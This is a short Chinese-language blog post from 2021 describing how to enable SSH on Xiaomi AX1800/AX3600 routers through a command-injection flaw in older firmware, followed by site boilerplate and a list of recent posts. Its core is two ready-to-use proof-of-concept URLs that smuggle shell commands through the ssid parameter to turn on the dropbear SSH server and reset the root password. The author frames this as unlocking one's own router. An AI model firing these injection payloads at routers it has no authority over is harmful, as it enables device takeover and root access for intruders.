AX1800 AX3600 漏洞利用及启动SSH方法

2021-03-31 coding wifi mi ax1800

证实，1.0.385 及以上固件封堵了这个漏洞。如需使用 SSH，请使用1.0.365 固件版本

具体原理请参见：原始论坛

下面放上POC用于备忘，具体使用时需要替换STOK：

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

改密码为 Admin：

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B

本人保留对侵权者及其全家发动因果律武器的权利

版权提醒

如无特殊申明，本站所有文章均是本人原创。转载请务必附上原文链接：https://www.elliot98.top/post/tech/ax1800-3600-ssh/。

AX1800 AX3600 漏洞利用及启动SSH方法

2021-03-31 coding wifi mi ax1800

本人保留对侵权者及其全家发动因果律武器的权利

版权提醒

Recent Posts

Wicklight protocol design

2023-02-03 golang coding proxy tls

Wicktls protocol design

2023-01-10 golang coding proxy tls

Overleaf 自建服务器搭建

2022-11-28 coding web overleaf

技术摘要| Windows 10/11 性能调度策略和 ThinkBook 14+ 2022 优化

2022-07-30 coding windows powershell

全新博客评论系统上线

2021-10-20 life blog web